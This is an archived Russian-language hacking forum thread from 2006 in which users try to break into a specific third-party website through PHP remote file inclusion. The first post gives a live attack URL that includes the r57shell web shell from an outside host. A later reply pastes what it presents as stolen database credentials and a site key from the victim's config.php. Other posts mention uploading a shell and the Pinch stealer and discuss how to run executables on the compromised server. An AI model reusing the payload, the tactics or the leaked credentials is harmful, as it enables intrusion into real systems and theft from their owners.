PDA

Просмотр полной версии : Windows NT & Safe mode (php inj)


DaemoniZ
11.07.2006, 15:10
Ребят... Подскажите как ломать... Я даже php бэкдор залить немогу.

http://www.rtk.it/SQuery/lib/gore.php?libpath=http://rst.void.ru/download/r57shell.txt?

Пасиба =)

zyl
11.07.2006, 16:16
Это по-моему не из той оперы
Здесь ошибка вида:
Fatal error: Class gore: Cannot inherit from undefined class gamespy in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 8

А для загрузки шелла нужно чтобы была:
Warning: main(libpat): failed to open stream: No such file or directory in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 13
Warning: main(libpat): Failed opening 'libpat' for inclusion (include_path='.;/usr/local/php/PEAR') in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 1

Может там какая то переменная висела

DaemoniZ
11.07.2006, 20:17
Хммм... А обойти-то можно как-нибудь? Что меня достаточно сильно удивило - я не могу нормально ползать по папкам.
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))

zyl
11.07.2006, 21:29
Хммм... А обойти-то можно как-нибудь?
Возможно что ошибаюсь, но по моему нет.

Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет?
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php

Ch3ck
12.07.2006, 00:13
Я как то читал про обход safe_mod но там жопа полная. Единсвенное чё можно пока сделать, так это читать любый файлы...(с помощью php_eval). Вот например небольшой кусок из config.php :
$dbhost = "62.149.150.56";
$dbuname = "Sql103994";
$dbpass = "41ebe44d";
$dbname = "Sql103994_1";
$prefix = "nuke";
$user_prefix = "nuke";
$dbtype = "MySQL";
$sitekey = "S·kQg*ит?^м#@и+~ю-?4Sd5%W@Y6Ђ7“ю2-dm29-.-39.3a8sUf+W9";
$gfx_chk = 7;
$subscription_url = "";
$admin_file = "admin";
$tipath = "images/topics/";
$advanced_editor = 0;
$display_errors = false;

DaemoniZ
12.07.2006, 01:11
Я как то читал про обход safe_mod но там жопа полная.[/I]

Да это действительно так. Дело все в том, что я даже не знаю как ломать. Хотелось-бы бэкдор залить (просто php файлик как-нить изменить) но вот понять не могу, где я могу писать, а где - нет.


Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php

Это про chmod. Он в *.nix системах, а в моем случае NT.

Electro
08.08.2006, 12:59
У меня анологичное ситуация (( Свервак под NT залил шелл + пинч на комп а вот команда C:\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф

Ch3ck
08.08.2006, 14:52
У меня анологичное ситуация (( Свервак под NT залил шелл пинч на комп а вот команда C:\\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
Конечно не отвечаю, что выйдет, но попробуй так:
C:\\ start [путь] x.exe
[путь] до файла...если в этой же дире, то не надо... :cool:

hidden
08.08.2006, 19:24
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))
Попробуй второй пример в "выполнить пхп код" вставить отсюда fileperms (http://ru.php.net/manual/en/function.fileperms.php)